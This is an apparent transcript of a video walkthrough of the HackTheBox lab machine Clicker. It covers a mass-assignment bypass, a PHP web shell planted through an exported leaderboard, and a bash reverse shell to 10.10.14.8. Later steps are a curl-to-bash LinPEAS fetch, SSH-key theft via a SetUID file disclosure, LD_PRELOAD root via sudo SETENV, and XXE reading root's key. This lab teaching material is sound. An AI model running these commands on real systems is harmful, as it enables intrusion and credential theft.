What's going on YouTube? This is Ipsec. We're doing Clicker from HackTheBox, which starts out with just a cheesy web-based game where you can click a mouse and get points. The first vulnerability in it is a mass assignment, which you'll use multiple times, but the first time you use it, you just change your user over to the administrator level. From there, you can now export the leaderboard to a file on the server, and you can also use the mass assignment vulnerability to change your name to be a PHP shell, so when you export the leaderboard, now you're dropping some PHP code that enables you to get a shell on the machine. From there is a SetUID binary that lets you run as a different user. It has a file disclosure vulnerability so you can leak the SSH key and gain access as Jack, who can then use sudo with setting environment variables. And the script that he uses actually runs curl. So the intended way is you create a environment variable to proxy curl to yourself, and that'll enable you to perform a XML any injection attack. However, you can set any variable pretty much, so you can just set LD preload and get code execution right away. That being said, let's just jump in. As always, we're going to start off with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it clicker, then the IP address of 10.10.11.232. This can take some time to run, so I've already ran it. Looking at the results, we have quite a bit of information going on here, so let's just look at it. The first thing we have is SSH on port 22, and its banner tells us it's an Ubuntu server. We also have HTTP on port 80. Its banner tells us it's Apache, also running on Ubuntu. And we have it redirecting us to clicker.htb. So I'm going to go ahead and add this really quick to my host file, sudo v etc host. And we can add 10.10.11.232 clicker.htb. Okay. And then the next thing we have open is RPC on port 111. And whenever I see this on Linux, the most common thing is always going to be NFS, and it looks like it is directing us to 2049 NFS. We can see that port is also open. If you don't know RPC, I think this is pretty much just going to be like a port mapper, so we connect to it and it tells us various services that are listening. It's used a lot on just some protocols. And it looks like NFS is allowing us to use protocol version number 3 or 4. If you don't know what NFS is, it is a network file server. It's just a way to share files remotely. Think of it like SMB on Linux, right? So the first command I always run to enumerate this is going to be a show mount command. So we'll do show mount 10.10.11.232, and we see nothing. If anyone had this server mounted, their IP addresses would be showing up here. And if you don't have this command, you can always run like an app cache search on show mount if you're on a Debian-based system, and it'll tell you what package it is. On parent is NFS common. I think I've seen it on like NFS util, but that may be like a CentOS Red Hat thing. So the next thing we want to do is show all the shares available. And in NFS terms, that is called exports. So it's a -e. So we'll do 10.10.11.232. And we see the share mount backups is available for everyone. So let us do a sudo mount and then -t nfs, specify the IP address of 10.10.11.232, mount backups, and then the directory we want to mount it to. I'm going to mount it to mnt, but first let's just make sure this directory exists in here. And since it is version 3, it is vulnerable to like client UID spoofing, which just means NFS doesn't really have good ACLs, at least in version 3. It depends on the client. So when I go in this, if I wanted to modify this, it's possible that I could just do a SU and I'll become root. And then when my NFS client sends my user ID over to the server, it's going to allow me access because there's no checking there. I go over that quite a bit in the jail video, which is an oldie but goodie, so definitely recommend watching that if you want to see more NFS shenanigans. I'm going to download this file, so I'll download clicker HTTP backup, and we'll unzip it and see what is in here. And I guess before we go in that, we could attempt to do that client UID spoofing. So if I do a SU, let's do sudo su, go into mount, touch, test. Can we write here? It looks like it is a read-only file system. Actually, mount, we gotta umount it. Because I think by default, if I just do mount real quick, we can see version 4.2, which does not have that UID spoofing vulnerability. So let's do a umount on mount. Then we can do a mount-t nfs-o verge equals 3. I always like adding the RW flag for read write. And then let's do 10, 10, 11, 232, mount backups, mount, ls mount. So we can go in here, touch test. It is still saying read-only file system. So there's probably some type of configuration in play that is preventing us from accessing it. We could just try one more thing that I don't think I've shown in a video. Mubix wrote a pretty cool NFSClient in Go. And the cool thing about this is normally when you do like a pen test and you land on a Windows box and you want to exploit a NFS server, it's relatively tough, at least until this binary, which is I think why he made it, because you don't have a good NFS client that's capable of spoofing. But this works pretty well. So let's just download that and show it. We don't have to be root. So let's wget this. And I'm just going to call it NFSClient. And I don't think this is going to work, but whenever like I'm trying something, I don't understand why I'm getting a permission error. I like switching out and using a second tool to just validate it, right? So we need to specify the host, so 10, 10, 11, 232. The access level, we'll do root 0, 0. And then the command, I'll just do ls/. We need the mount path. Mount backups. Permission denied. I think we have to run this as root. We do. So we have that working. You can go and look at the other commands this supports. We want to just see if we can write files. I'm going to try like a make dir command. So we can do make dir test. And we get an error NFS read-only file system. So it looks like NFS itself is just configured to be read-only. So there's going to be no vulnerabilities in NFS at all. So I think we've done a good job enumerating that, right? So pretty cool to always do things with two clients. We have unzipped the zip. So let's take a look at what it is. And it looks like a zip to a web server. If we do lsla, we don't have that much. So I'm guessing the next step is going to be some type of code analysis. But before I jump into code analysis, I always like taking a look at the web server itself so I know what code I am looking at, right? So let's go to 10, 10, 11, 232. It's going to redirect us to clicker.htb. And we see it is a video game, it looks like. Clicker the game. The ultimate experience, join countless players and playing the most amazing game ever. How many clicks can you get? So let's go, I guess, register. I'm going to do IPsec password, I guess. We go to info. It looks like it's just reviews. Let's go to login. IPsec password. And now we have a profile. So we can see our profile. And there's also a play link. If we click here, it's just keeping track of our clicks, and we can level up. We can save and close, and it looks like our game has been saved. So if I click it again, I start where I am. Whoa, I don't know what just happened here, but now my clicks, like, I'm getting 5 per click. That is bizarre. Maybe that's a level up. Okay, yeah, when you level up, you get more clicks. Okay, so we kind of understand the game. Silly, but okay. Let's open up Visual Studio Code now. And this is going to let us just quickly scan for vulnerabilities with Snyk, and then we'll also be able to look for other things, right? So let's see. We have the code security. It looks like it is scanning. I'm kind of curious about this. If we go to info.php, okay, so it's not doing any type of like framework. It's just raw PHP. Let's go to Snyk and see. Bootstrap, that's not going to be useful. We have admin 2 vulnerabilities. Looks like XSS. Cross-site scripting, cross-site scripting, cross-site scripting, cross-site scripting, cross-site scripting. DB utils, hard-coded credentials. Clicker DB password, clicker DB user. And then we do MySQL. Diagnostic, password hash. See, I don't know what this is. What is this hash? I'm going to Google this because it's just an MD5. So if we Google this hash, what does it reverse to? It looks like this. Echo-n MD5 sum. That's not what it is. Oh. Okay. I think it was like someone like Google indexed the page calling itself. That was weird. So that is not right. Doesn't look like we get anything. So that's not there. And what would this do even? It would allow us to hit diagnostic.php, which has some XML stuff. So this would be probably XML any injection, I'm guessing. I'm not sure. So Snyk doesn't really tell us that much. Let's just go look at the code. So where are all the places we have user input? When we register, right? So let's look at the registration. Let's see, where is the PHP code here? It's probably under create player, I'm guessing. So we send username, password. So it looks like the username has to be alphanumeric. So we know that. It checks if it exists, and then we create new player, and it only creates it with username and password. So what I was looking for here is some type of like mass assignment vulnerability, right? If it just did like PHP input or something, I think that's how you do it in PHP, then it'd be vulnerable to mass assignment because we could put various things in there, right? Because it'd just be looping over. So let's look at this. Params player. This is all prepared statements, so nothing there. Let's see what other things there are. Are we ever using this DB PDO prepare without prepared? Or without like this? We're looking for whenever a variable gets passed into PDO prepare because that becomes interesting to us. Not there. And we found one. On the prepare statement here, we have set string being passed. And then this looks like it's going against our player. So let's see what this is. Params, we assign our player. Set string, we're going to loop over all the arguments. And then create a thing. Okay. So let's look at what call save profile. This is looking like it could be mass assignment. Let's see. So on this save session, this is where it gets called. We're going to send all the keys. We're going to look for a key that equals role. And if it does, it's going to say malicious activity detected. We have that right here. So I'm guessing what we want to do is be able to get our key in here, right? Because what the set statement is going to be doing is actually, I'll do it beyond root and we'll go over this more in depth. We'll do that right after we exploit it. Because all this is doing is essentially like setting our variables. So if we put role equals admin here, then it would set a role to admin where it is player, right? So we'll go more in depth than that in a little bit. Let's see. Do we have what roles there are? Let's go find in files, role. So we want admin with a capital A, it looks like. So there's going to be, let's see, probably two ways we can get about this. We're going to do the easier way first. So if we look at save profile, whoops, find thing. It is looking for when role is equal, when the variable role is set. So if we create a game. Let's send it over to Burp Suite. We can go to proxy, intercept on, save and close, go to repeater. So this is where we save. And it's taking all these variables and putting it in that update command. So if I did role is equal to admin like this, it's going to redirect us. We're going to follow the redirection, and it should say malicious activity detected. So that did not work. But the one really cool thing is anything we put here is going to be checked against that, right? We just want this piece to not equal role. And this gets fed over into a SQL statement, right? So we go here, we send all the arguments over to the save profile. And SQL statements are generally terminated like by a semicolon. So what we could do is put a line break in there, right? Because if we did like a select star from and then users, like this query is the same as if we didn't have a line break. So I think that's why this works. So let's go back to Burp Suite, and we're going to say role %0a because that is line break in hex. We're going to send this request. We can follow the redirection, and we see game has been saved here. So if we go back, let's turn our proxy off. Go back to clicker.htb. We don't have anything here, but generally speaking, when you log in, that's when it signs all your groups, right? So let's log in again. Since now a role theoretically is admin. So we'll do IPsec and password. Authentication failed. I wonder if something deleted my IPsec user. Like it could be a self-healing script. Let's try this again. Let's register IPsec password. We're logged in. Or we're registered. IPsec password. And there was a check if user exists thing, right? So unless we deleted our user, it definitely got deleted out of the database. So let's go back here. Save this. Refresh this page. Control Shift R for good measure. We still don't have a like anything different here. If we log in, let's do IPsec password. Now we have an administration page. What's going on? This is IP from the future. And the whole bypassing this check here by putting a line break was unintended. The intended way is still similar. You're still updating your role, but you're doing so in a way where your key is never set to role. You actually put role equals admin in the value itself. So let's go take a look at this real quick. If we go to save profile, we're going to inject in this setStr variable. Because it's not parameterized, it's just a raw string here, right? So this is kind of like a mass assignment. So here, we're going through each argument and building a query. And it's hard to just visualize what's going on here. So I'm going to put a echo statement here. So if we echo set string, and then hit this again. Oh, whoops, we actually want to go to update role. We just get a 302 found. Oh, silly me. We have to actually put this in the server, right? Because that's a local copy. So let's go to save profile. There we go. And let's see. Let's say my role admin. I don't want that. Is it user? What is this redirect doing? Malicious activity. Awesome. Oh, because I have role equals. Okay. That's better. So what I want to do is make sure I'm not an admin real quick. So we log in, IPsec password. I am not an admin. That is good. And we can see the SQL query down here. So what we want to do is, let's see, what's a good way to explain this? So if I did %d here, or 3d, which is a URL encoded equal sign, 3d, this is now the key, right? So what we could do is say role %3d is equal to, oh, we don't do equal. So role is equal to admin, and then comma, clicks is equal to all nines. So when I run this query, this is what the set command looks like. And we're going to bypass the previous check because it sees this as the key, or this as the key, yeah. So at no point is just role in this key, right? It is this entire thing, and then this is the value of that key. But the SQL statement sees it that way, right? So if we look at the query, if we go here, this is where the query is. So we're going to update the players table. We're going to set role is equal to admin, clicks is equal to all nines, level is equal to elite, where username is equal to my ID. So that's what this query did. So we sent that, we log out, we log in, IPsec, password, and we're back to administrator. So that is the intended way, kind of like a mass assignment vulnerability with a small twist. But let's get back to the present time and enumerating what is on this administration page. So this administration page enables us to, I guess, view the leaderboard. We can probably get our username up here if we played the game. So let's go back here. We can do play. And I'm just going to, we probably didn't even have to play. We could probably just do clicks, a bunch of nines, right? We no longer need to do this roll thing. We can also do level. Let's do elite level. So now if I go back here, do I see my name? I do. Awesome. So if we click on export or thing, we see text, JSON, HTML. If I export here, it's going to save that in a file, right? So if I look here, we have this. So the first thing we want to do is see if this is a user-controlled thing, right? So if there's no validation on the extension in the database, then we can make a PHP file, and then we just have to figure out a way to get PHP on this. So back to the source code. Let's look at admin.php, and let's see. Administration pane. Where is export? So it looks like export.php it calls. And then let's see. Here we go. So post extension equals JSON. It doesn't look like there's validation. They do some things, like if it's text, it'll do this. If it's JSON, it'll encode it. But I don't see anything actually saying, like, if it doesn't equal text JSON or, I forget the other one, HTML, then do nothing. So we should be able just to, like, write PHP. We can test that out real quick. Let's go to Burp Suite, intercept. We'll just export this, put the extension to PHP for this, and we see it created a PHP file for us. So if we go to exports, whoops, I only copied the file name. There we have it. So what we really want to do now, oddly enough, I'm here twice. Don't understand that, but okay. So we want to figure out how this table is generated, I guess. So let's see. If we go to admin, looks like we have nickname, clicks, and level. And it's calling this get top players function. So if we look at this, it's going to select, select nickname and clicks from players. So where is nickname? That is not something I've seen before. Whoops. I want to do edit, find in files, nickname. That is part of the session. Okay, so it's going to probably be the same thing we did here. Let's go back a few. There we go. We can put these back so I still have a high score. So instead of doing roll, I'm going to call this update roll. And this one will be set nickname. So since this is like our mass assignment where we can just edit fields in the database for a user, I'm going to try nickname is equal to please subscribe. Save this. Refresh this page. And we see my nickname is now please subscribe. So we can put anything we want here. So let's try putting some PHP. So I'll do PHP system, and then we'll say anything in this request object, CMD. Okay. So all this means is it can be a post or a GET request. So let's URL encode this. We will send it. If we refresh, we don't see anything there. But if I do $CMD equals ID, uh-oh, I thought we would see something. Oh, we probably have to export it. So let's intercept a request, send to repeater, extension, PHP. We can forward this. I just want to put it in repeater in case we have to do this again. So we see it was saved in this file. Let's try accessing it. So HTTP, clicker.htb exports this. CMD equals ID. There we go. This failed because we didn't have like a check if ID is set. So there's actually a PHP error that we just can't see. But if we do CMD ID, we can see we have successfully executed code. So let's go ahead and turn intercept on, refresh this page. I'm going to send it to repeater. This will be export PHP. We'll call this one shell. And the reason why I always like just sending it to repeater is so I can put it in a post request, because I find post request so much more stable when doing this than a GET request. So let's do bash-c, bash-i, dev, tcp 10.10.14.8, 9001, 0, and 1 like that. URL encode this, because the bad character is going to be the ampersands or the and signs, because that's how post requests terminate a argument, right, to go to the next variable. So we definitely have to URL encode those. And now we should be able to do nc lvnp 9001, send this, and we got the shell. So let's do a python 3-c import pty, pty.spawn, bin bash. Okay, stty raw minus echo foreground. And then we can export term is equal to xterm. So we can now clear the screen. So the first thing I want to do is just check out the database. So we know it was hard-coded. I want to say it was in db utils. So let's take a look at that. And it looks like that's actually the password still. I thought this was just like a generic thing we had in our source code, but okay. So by SQL-u, clicker db user-p, we'll put in the password. And then let's do show databases, use clicker, show tables. Oh, only one thing. Select start from players. And I'm guessing these are SHA-512 hashes, maybe? Let's see. Hash identifier. There's got to be an online service that does this. Oh, hash analyzer. Try this. Analyze it. SHA-256. So we could search this hash to see if we have anything. It doesn't look like anything comes up. So let's now see what else we have on this. Let's see. think I'm just going to, let's go to the home directory first. We're not a member of the Jack group, so we can't go in here. Let's just run LinPEAS. It's been a while since we ran LinPEAS, and I always love running that on this. So let's cp opt, what do I call it? Peas, linpeas.sh. Let's make dir dub, move linpeas.sh in here. I think I copied it up one directory, whoops. And dub, Python 3, HTTP server, curl 10.10.14, 8, 8000, linpeas.sh, pipe it over to bash, and we will come back when this finishes running. Okay, linpeas is finished running. So let's go to the top. I'll go back to my curl command and we can begin looking at it. Looking at exploit suggester. This is always my last call. These are very old CVEs. I highly doubt that would be the vector. And I'm going to copy that so we can just search on that little bar. It makes it a bit easier to navigate down. So cleaned processes. This is just looking for weird processes. And of course, a reverse shell is a bit weird. Going down, just really looking for where it looks interesting. Timer files, socket files. Nothing interesting. Interfaces, ports. I guess we could look at all the ports. And remember, we already kind of enumerated NFS, so that's why I'm not going there. No TCP dump. Users. Logon time. MySQL version. Nothing interesting so far. HTTP_WD, but this looks like it's just in some test files, so not interesting to us. rsync looks like that's a example config. NFS export, this is where we see it being exported. Oddly enough, it says read write, but it was definitely read only. It's probably like mounted read write in the read only in like the NFS config or something. Postfix, DNS. Okay, I always like looking at SetUIDs. We do have a unknown SetUID binary. This is opt manage execute query owned by Jack. So this is probably where we want to start. That'll get us over to the Jack user, because when it's SetUID, that just means you can execute it as that user. I don't know what what this is. Write.ul? That is weird. Google. It's a BSD extra thing in Debian testing. Okay. So this is definitely non-standard. So let's take a look at this. Do lsla on it. We can go into this directory, opt manage. And let's see, there is a README. So use a binary to create the following task. Create database structure, fake players, reset the admin password, delete all users. So if we execute it, we need arguments. So we execute with 1. It's putting a password on MySQL and just doing things. Go 4. So that's deleting non-admin players. If we do 5, we get to a seg fault, which is interesting. So I'm going to download this binary, and then we can open it up in Ghidra to look at it. You could probably figure this out through fuzzing, but no reason not to use Ghidra here. So let's cat this binary over to dev TCP 10.10.14.8 9001. And we'll direct this to execute query. Okay. Send the file. let's MD5 sum both ends. F09, F09, ends in 8.1, ends in 8.1. So we have the binary. Okay, so let's go opt Ghidra, Ghidra run. And wow, my size is pretty big. The font size, I forget exactly how I had this configured. New project, doesn't really matter. I'm not going to save this. Open this up. Okay, so let's hit I. Then we can open the execute binary, or execute query binary, and analyze it. Select all, analyze, okay. So let's go to the exports. We got main, and we can see what it's doing. So the first thing I like looking for is if we executed the binary, or we can cat the README, it had a menu of just options, right? 1, 2, 3, 4. And that's what we see here. We have case 1. It's going to copy create.sql onto PCVar3. It's going to copy populate SQL onto this variable. So this is what we see it doing here. So if it doesn't match any of these cases, so if it's not 0 through 4, it's just going to copy the parameter on the stack. So we can say PCVar3. Let's rename this. I hit L. I'm going to call this file name. Because these all look like file names to me, right? Let's see, what is this? Local 98. That is a string. That's home, then JA. So that's home jack query. Queries. So what this string is doing, it's building home jack queries. So len. So this is going to prepend, I think, home jack queries onto the file name, maybe is what it's going to do here. strcat 98. So we can say this will be file path. Okay. And then this is user bin MySQL -u. This is going to be the clicker user. So this is running the MySQL command. How does this terminate? Let's see. Is there a better way to do this? Let's see. There's probably a better way I could just redefine this so it says the full string, right? Oh well. Not exactly sure. But that's executing MySQL. I'm putting the password there. Then we cat the file and read it. So that is doing system on file name. But it doesn't have the path there. I'm guessing we prepended the path somewhere. I missed it. So let's try this out. Let's try to read a file. So as long as we don't specify 0 through 4, let's just do 9. Then we're going to hit this default. And that's going to allow us to specify a file. So I'll do etc passwd. File not readable. So it was in home jack queries is what we said. So let's go up 3 directories. So we can go 1, 2, 3. And we get the passwd file. So my bet is let's try reading a file. Let's do temp. Oh, I'm not going to do. Maybe I can do. No, I'm scared of doing temp. Whenever I'm a reverse shell, because of the whole private temp in systemd, I'm always terrified of using temp directories. So I'm going to drop this. Where is a good world writable place? We can write to var dub HTML. touch test. Can't touch there. We can do, let's just look at SHM real quick. No sudo. Okay. The thing I was scared about of dev SHM is it having no exec, which could prevent some things, but it does not. So I'm going to call shell.sh. Let's just do please subscribe. And then I want to make sure we can read this. So dev shm shell.sh. We have to do opt, then manage. What is monitor.sh? File not readable or found. Opt, manage, execute query, etc passwd. You read that. Dev shm shell.sh. chmod 777 shell.sh. I'm not sure why I can't find that directory or that file. Let's see, var www. Let's go var www html. Oh, we couldn't write here. Clicker. We know we can write to exports because that's where this thing writes, right? So touch, please subscribe.sh. We can just do opt, manage, execute query. Oh, this TTY is going to be horrible. STTY-A, STTY rows 28, columns 110. There we go. So now when I go off the screen, it'll actually wrap down. So opt, manage, execute. Let's do 9, 1, 2, 3. Then we can do var www clicker htb exports shell.sh. We call it please subscribe.sh. So we still can't read this. I don't know why we could read etc passwd. If we go up too far, it looks like we get a weird error. Okay. So the other thing we can do is probably get like an SSH key. It's in home jack we want to get to that directory. We are in this directory. So I'm just going to go up one directory. So I go to SSH, right? So we'll do one up .ssh ID RSA, and we have a key. So let's copy this SSH key. Okay. I'll call it Jack. Paste it in. chmod 600 Jack. 10, 11, 232. Invalid key format. Okay. You do 5 dashes before and after this. So for some reason, the format was just broke there. It's odd that those dashes actually matter. Okay, we did not specify the username here. And it looks like we got in. Awesome. So we can see the queries directory. If we go in here, these are going to be all the file names that was in that binary. So now if we do a sudo-l, we can see Jack can run anything. So if we do sudo su, we get a password because no passwd isn't set here. It's not that easy. But we can execute things as root as long as we hit opt monitor.sh. And we have this set end thing, which means we can pass environment variables over to this. So if we look at opt monitor.sh, we see it's making sure we're running this as sudo. Then we're going to set the path. It's going to unset these variables. Then we're going to curl this diagnostic.php, and that MD5 something was the secret diagnostic token. So that's what, let's see, do we have it up still? If we go to diagnostic, that's what this hash is. Okay. And then we're going to pipe that data into the XML processor, and that's about it. So there's a really fun unintended here is because we have this whole setEnv thing here, we can put any environment variable we want, such as like LD preload, right? We got env reset here, and that's what normally prevents this, because when we run sudo, it's going to reset the environment. However, this allows us to change the environment. So we can set LD preload, which means we can do a lot of dirty things. So I'm going to check if GCC exists. It does not. Let's go over to my machine. Let's make exploit. We'll call it, we'll just call it exploit.c, right? So let's create a function. I'm going to use _init because this gets loaded whenever the library is loaded. Because of that, we definitely want to make sure we unset this before we call a binary, right? Because if we didn't do this, then whatever we're injecting, like the LD preload binary is going to call shell, which then, because LD preload is set, it's going to call shell, and then because LD preload is set, it's going to call shell. I'm going to get into this like infinite loop or nesting, whatever, because of this, right? If you don't know what LD preload is, I think it's like link or dynamic. So whenever a non-statically compiled binary executes, it'll load this binary that lets you override functions. We didn't have to do init. We could just like override the put function. So when it wrote to screen or something, then we'd execute. I guess a legitimate use case of LD preload is similar to proxy chains. Even though it's not using LD preload, proxy chains, you execute it, and it's hijacking that dynamic linker process in order to overwrite any web call so it can redirect the web call to itself to set the proxy. That's how proxy chains works, and why proxy chain doesn't work on Golang binaries, because Golang is statically compiled. So that's essentially what we're doing. We're just hijacking the function. So whenever a library is loaded, or this one is loaded, it's going to call bin bash. And if you go to ipsec.rocks and search it, I'm sure I have more topics on LD preload. So let's now include, this is standard lib. There we go. That looks good. So we can say GCC, we'll do -shared because it's a library. We'll call it exploit. Okay. So we're multiple defining init because the compiler added init for us. We want -no start files because we don't want it to do that. And there we go. Compiled without error. And without warning too, which is awesome. So let's copy exploit to dub. And then we can go dev shm. Let's download this. So wget 10.10.14.8, 8000, exploit. I should still have that web server running. I do. So we have the binary here. So if we do sudo -l, we can do a sudo opt monitor.sh. It's going to execute because setEnv is there. We can say LD preload and say load the exploit library. We probably should have named it .so or something, but oh well. We do this, and immediately we get root. So that is the unintended way. What? Exit. No, really. Exit. No, really. Exit. Oh my God. There we go. So what was happening there is because we injected LD preload, let's see, or how we did that, because we did it like anytime a binary executed, it would hit our function, right? And we unset the LD preload env, but it only unset it for that load when we were executing bash, right? So we probably loaded here. No, we loaded in curl. We loaded in this XML. We loaded in date. We may have loaded in echo, but I don't think that is, I think that's statically compiled. But we kept loading in all these locations, which is why you saw that shell happen multiple times. If we didn't put that unset LD preload env in there, who knows what would have happened? All chaos, right? So if you override the init function to do that, make sure you unset it. So let's see, let's go to the intended way. And I say it was only slightly different because we're still injecting a variable, right? I mentioned this is probably going to be vulnerable to XML ND injection. So how can we get data in here? We could look at like trying to modify the database, but if we look at this diagnostic function, nothing really dynamic is there. So we can't change the data. Where is it? Diagnostic. We do this, timestamp, date, PHP version. So since we can't really change the data by manipulating the database, we could inject a proxy here. So curl now comes to us. And then instead of saying, let's get rid of this LD preload. Instead of saying, here's this XML, we can replace it with whatever XML we want, right? So let's do that. The first step is get a proxy running. So let's go back to Burp Suite, proxy settings. We'll edit this and change it to listen on all interfaces. This way, the server can hit our proxy, right? So now let's do sudo, then specify HTTP proxy is equal to HTTP, not localhost, 10.10.14.8.80.80. We intercepting? We are. 10.10.14.8.80.80. It's up. Oh, I think curl is case sensitive on variable names. It's really annoying. I think it's all lowercase. There we go. It's hung. So we see the server is requesting this. So if I go here, intercept the response to this request, now we have the XML data, right? So all we have to do is put our XML ND injection in here. So we can probably get rid of this. Then let's go over to Hacktricks to get a proof of concept. So we can say XML ND injection read file Hacktricks. Go over here. And let's see. I like just searching for like Etsy PassWD because that's the example that's used often, right? Oh man, where'd it go? Etsy PassWD. There we go. So let's try copying this and see if it works. So we can put that there. Then this. We already had data, so we can, let's get rid of one data. I'm going to put this on my clipboard. Forward. And we have PassWD here. Actually, we don't need data at all. So let's intercept on. Run this again. Want to intercept response. So we can grab the key. So let's change this. Try root SSH ID RSA. So again, if you're not familiar with ND injection, all we're doing essentially is creating a XML object that says get this file, and then this data is where we inject it to. That's a horrible example. Just go to ipsec.rocks, search XML ND injection, and I'm sure it will be a little bit better explanation than that. Or you can just Google XML ND injection, right? I'm assuming you know. I don't need to spend 5 minutes explaining every concept. But there we go. We have the SSH key as root. So let's try it out. V root paste chmod 600 root sh-i root at 10.10.11.232. We need to specify the key file. And there we go. We have rooted the box with both the unintended and intended way. Hope you guys enjoyed that. Take care, and I'll see you all next time.